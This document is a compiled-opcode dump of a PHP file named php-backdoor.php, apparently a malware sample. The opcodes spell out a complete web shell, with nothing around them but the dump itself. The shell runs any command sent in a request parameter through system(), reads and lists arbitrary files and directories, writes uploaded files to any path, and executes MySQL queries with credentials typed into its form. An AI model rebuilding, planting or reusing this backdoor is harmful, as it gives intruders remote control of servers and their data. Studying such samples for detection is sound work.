|filename:|/root/samples/php-backdoor.php
|functionname:|(null)
|numberofops:|183
|compiledvars:|!0=$filename,|!1=$file,|!2=$d,|!3=$handle,|!4=$dir,|!5=$PHP_SELF,|!6=$fname,|!7=$HTTP_POST_FILES,|!8=$host,|!9=$usr,|!10=$passwd,|!11=$db,|!12=$mquery,|!13=$result,|!14=$row,|!15=$SERVER_NAME,|!16=$REQUEST_URI
|line|#*|||op|fetch|ext|return|operands
|4|0|E>|INIT_FCALL||||'ob_implicit_flush'|
||1||DO_ICALL||||
|5|2||FETCH_IS|||~18|'_REQUEST'|
||3||ISSET_ISEMPTY_DIM_OBJ||0||~18|,|'f'|
||4|>|JMPZ||||~19|,|->18|
|6|5|>|FETCH_R|global||~20|'_REQUEST'|
||6||FETCH_DIM_R|||~21|~20|,|'f'|
||7||ASSIGN||||!0|,|~21|
|7|8||INIT_FCALL||||'fopen'|
||9||CAST||6|~23|!0|
||10||SEND_VAL||||~23|
||11||SEND_VAL||||'rb'|
||12||DO_ICALL|||$24|
||13||ASSIGN||||!1|,|$24|
|8|14||INIT_FCALL||||'fpassthru'|
||15||SEND_VAR||||!1|
||16||DO_ICALL||||
|9|17|>|EXIT||||
|11|18|>|FETCH_IS|||~27|'_REQUEST'|
||19||ISSET_ISEMPTY_DIM_OBJ||0||~27|,|'d'|
||20|>|JMPZ||||~28|,|->75|
|12|21|>|FETCH_R|global||~29|'_REQUEST'|
||22||FETCH_DIM_R|||~30|~29|,|'d'|
||23||ASSIGN||||!2|,|~30|
|13|24||ECHO||||'%3Cpre%3E'|
|14|25||INIT_FCALL||||'opendir'|
||26||CAST||6|~32|!2|
||27||SEND_VAL||||~32|
||28||DO_ICALL|||$33|
||29||ASSIGN|||~34|!3|,|$33|
||30|>|JMPZ||||~34|,|->70|
|15|31|>|ROPE_INIT||3|~36|'%3Ch2%3Elisting+of+'|
||32||ROPE_ADD||1|~36|~36|,|!2|
||33||ROPE_END||2|~35|~36|,|'%3C%2Fh2%3E'|
||34||ECHO||||~35|
|16|35|>|JMP||||->64|
|17|36|>|INIT_FCALL||||'is_dir'|
||37||ROPE_INIT||3|~39|!2|
||38||ROPE_ADD||1|~39|~39|,|'%2F'|
||39||ROPE_END||2|~38|~39|,|!4|
||40||SEND_VAL||||~38|
||41||DO_ICALL|||$41|
||42|>|JMPZ||||$41|,|->52|
||43|>|ROPE_INIT||7|~43|'%3Ca+href%3D%27'|
||44||ROPE_ADD||1|~43|~43|,|!5|
||45||ROPE_ADD||2|~43|~43|,|'%3Fd%3D'|
||46||ROPE_ADD||3|~43|~43|,|!2|
||47||ROPE_ADD||4|~43|~43|,|'%2F'|
||48||ROPE_ADD||5|~43|~43|,|!4|
||49||ROPE_END||6|~42|~43|,|'%27%3E%3Cfont+color%3Dgrey%3E'|
||50||ECHO||||~42|
||51|>|JMP||||->60|
|18|52|>|ROPE_INIT||7|~48|'%3Ca+href%3D%27'|
||53||ROPE_ADD||1|~48|~48|,|!5|
||54||ROPE_ADD||2|~48|~48|,|'%3Ff%3D'|
||55||ROPE_ADD||3|~48|~48|,|!2|
||56||ROPE_ADD||4|~48|~48|,|'%2F'|
||57||ROPE_ADD||5|~48|~48|,|!4|
||58||ROPE_END||6|~47|~48|,|'%27%3E%3Cfont+color%3Dblack%3E'|
||59||ECHO||||~47|
|19|60|>|NOP||||
||61||FAST_CONCAT|||~52|!4|,|'%0A'|
||62||ECHO||||~52|
|20|63||ECHO||||'%3C%2Ffont%3E%3C%2Fa%3E'|
|16|64|>|INIT_FCALL||||'readdir'|
||65||SEND_VAR||||!3|
||66||DO_ICALL|||$53|
||67||ASSIGN|||~54|!4|,|$53|
||68|>|JMPNZ||||~54|,|->36|
||69|>>|JMP||||->71|
|23|70|>|ECHO||||'opendir%28%29+failed'|
|24|71|>|INIT_FCALL||||'closedir'|
||72||SEND_VAR||||!3|
||73||DO_ICALL||||
|25|74|>|EXIT||||'%3Chr%3E'|
|27|75|>|FETCH_IS|||~56|'_REQUEST'|
||76||ISSET_ISEMPTY_DIM_OBJ||0||~56|,|'c'|
||77|>|JMPZ||||~57|,|->85|
|28|78|>|ECHO||||'%3Cpre%3E'|
|29|79||INIT_FCALL||||'system'|
||80||FETCH_R|global||~58|'_REQUEST'|
||81||FETCH_DIM_R|||~59|~58|,|'c'|
||82||SEND_VAL||||~59|
||83||DO_ICALL||||
|30|84|>|EXIT||||
|32|85|>|FETCH_IS|||~61|'_REQUEST'|
||86||ISSET_ISEMPTY_DIM_OBJ||0||~61|,|'upload'|
||87|>|JMPZ||||~62|,|->110|
|34|88|>|FETCH_IS|||~63|'_REQUEST'|
||89||ISSET_ISEMPTY_DIM_OBJ||0|~64|~63|,|'dir'|
||90||BOOL_NOT|||~65|~64|
||91|>|JMPZ||||~65|,|->94|
||92|>>|EXIT||||'hey%2Cspecify+directory%21'|
||93|*|JMP||||->97|
|35|94|>|FETCH_R|global||~66|'_REQUEST'|
||95||FETCH_DIM_R|||~67|~66|,|'dir'|
||96||ASSIGN||||!4|,|~67|
|36|97||FETCH_DIM_R|||~69|!7|,|'file_name'|
||98||FETCH_DIM_R|||~70|~69|,|'name'|
||99||ASSIGN||||!6|,|~70|
|37|100||INIT_FCALL||||'move_uploaded_file'|
||101||FETCH_DIM_R|||~72|!7|,|'file_name'|
||102||FETCH_DIM_R|||~73|~72|,|'tmp_name'|
||103||SEND_VAL||||~73|
||104||CONCAT|||~74|!4|,|!6|
||105||SEND_VAL||||~74|
||106||DO_ICALL|||$75|
||107||BOOL_NOT|||~76|$75|
||108|>|JMPZ||||~76|,|->110|
|38|109|>>|EXIT||||'file+uploading+error.'|
|40|110|>|FETCH_IS|||~77|'_REQUEST'|
||111||ISSET_ISEMPTY_DIM_OBJ||0||~77|,|'mquery'|
||112|>|JMPZ||||~78|,|->169|
|42|113|>|FETCH_R|global||~79|'_REQUEST'|
||114||FETCH_DIM_R|||~80|~79|,|'host'|
||115||ASSIGN||||!8|,|~80|
|43|116||FETCH_R|global||~82|'_REQUEST'|
||117||FETCH_DIM_R|||~83|~82|,|'usr'|
||118||ASSIGN||||!9|,|~83|
|44|119||FETCH_R|global||~85|'_REQUEST'|
||120||FETCH_DIM_R|||~86|~85|,|'passwd'|
||121||ASSIGN||||!10|,|~86|
|45|122||FETCH_R|global||~88|'_REQUEST'|
||123||FETCH_DIM_R|||~89|~88|,|'db'|
||124||ASSIGN||||!11|,|~89|
|46|125||FETCH_R|global||~91|'_REQUEST'|
||126||FETCH_DIM_R|||~92|~91|,|'mquery'|
||127||ASSIGN||||!12|,|~92|
|47|128||INIT_FCALL_BY_NAME||||'mysql_connect'|
||129||CAST||6|~94|!8|
||130||SEND_VAL_EX||||~94|
||131||CAST||6|~95|!9|
||132||SEND_VAL_EX||||~95|
||133||CAST||6|~96|!10|
||134||SEND_VAL_EX||||~96|
||135||DO_FCALL||0|$97|
||136|>|JMPNZ_EX|||~98|$97|,|->142|
|48|137|>|INIT_FCALL_BY_NAME||||'mysql_error'|
||138||DO_FCALL||0|$99|
||139||CONCAT|||~100|'Could+not+connect%3A+'|,|$99|
||140|>|EXIT||||~100|
||141|*|BOOL|||~98|<true>|
|49|142|>|INIT_FCALL_BY_NAME||||'mysql_select_db'|
||143||CAST||6|~101|!11|
||144||SEND_VAL_EX||||~101|
||145||DO_FCALL||0||
|50|146||INIT_FCALL_BY_NAME||||'mysql_query'|
||147||CAST||6|~103|!12|
||148||SEND_VAL_EX||||~103|
||149||DO_FCALL||0|$104|
||150||ASSIGN||||!13|,|$104|
|51|151||BOOL|||~106|!13|
||152|>|JMPZ||||~106|,|->154|
||153|>|ECHO||||'%3Cpre%3E%3Ch2%3Equery+was+executed+correctly%3C%2Fh2%3E%0A'|
|52|154|>>|JMP||||->158|
||155|>|INIT_FCALL||||'print_r'|
||156||SEND_VAR||||!14|
||157||DO_ICALL||||
||158|>|INIT_FCALL_BY_NAME||||'mysql_fetch_array'|
||159||SEND_VAR_EX||||!13|
||160||FETCH_CONSTANT|||~108|'MYSQL_ASSOC'|
||161||SEND_VAL_EX||||~108|
||162||DO_FCALL||0|$109|
||163||ASSIGN|||~110|!14|,|$109|
||164|>|JMPNZ||||~110|,|->155|
|53|165|>|INIT_FCALL_BY_NAME||||'mysql_free_result'|
||166||SEND_VAR_EX||||!13|
||167||DO_FCALL||0||
|54|168|>|EXIT||||
|57|169|>|ECHO||||'%3Cpre%3E%3Cform+action%3D%22'|
||170||ECHO||||!5|
||171||ECHO||||'%22+METHOD%3DGET+%3Eexecute+command%3A+%3Cinput+type%3D%22text%22+name%3D%22c%22%3E%3Cinput+type%3D%22submit%22+value%3D%22go%22%3E%3Chr%3E%3C%2Fform%3E%0A%3Cform+enctype%3D%22multipart%2Fform-data%22+action%3D%22'|
|58|172||ECHO||||!5|
||173||ECHO||||'%22+method%3D%22post%22%3E%3Cinput+type%3D%22hidden%22+name%3D%22MAX_FILE_SIZE%22+value%3D%221000000000%22%3E%0Aupload+file%3A%3Cinput+name%3D%22file_name%22+type%3D%22file%22%3E+++to+dir%3A+%3Cinput+type%3D%22text%22+name%3D%22dir%22%3E%26nbsp%3B%26nbsp%3B%3Cinput+type%3D%22submit%22+name%3D%22upload%22+value%3D%22upload%22%3E%3C%2Fform%3E%0A%3Chr%3Eto+browse+go+to+http%3A%2F%2F%3C%3F+echo+%24SERVER_NAME.%24REQUEST_URI%3B+%3F%3E%3Fd%3D%5Bdirectory+here%5D%0A%3Cbr%3Efor+example%3A%0Ahttp%3A%2F%2F'|
|62|174||CONCAT|||~112|!15|,|!16|
||175||ECHO||||~112|
||176||ECHO||||'%3Fd%3D%2Fetc+on+%2Anix%0Aor+http%3A%2F%2F'|
|63|177||CONCAT|||~113|!15|,|!16|
||178||ECHO||||~113|
||179||ECHO||||'%3Fd%3Dc%3A%2Fwindows+on+win%0A%3Chr%3Eexecute+mysql+query%3A%0A%3Cform+action%3D%22'|
|65|180||ECHO||||!5|
||181||ECHO||||'%22+METHOD%3DGET+%3E%0Ahost%3A%3Cinput+type%3D%22text%22+name%3D%22host%22value%3D%22localhost%22%3E++user%3A+%3Cinput+type%3D%22text%22+name%3D%22usr%22+value%3Droot%3E+password%3A+%3Cinput+type%3D%22text%22+name%3D%22passwd%22%3E%0A%0Adatabase%3A+%3Cinput+type%3D%22text%22+name%3D%22db%22%3E++query%3A+%3Cinput+type%3D%22text%22+name%3D%22mquery%22%3E+%3Cinput+type%3D%22submit%22+value%3D%22execute%22%3E%0A%3C%2Fform%3E%0A%0A%3C%21--%09http%3A%2F%2Fmichaeldaw.org%092006+%09--%3E%0A'|
|72|182|>|RETURN||||1|
|
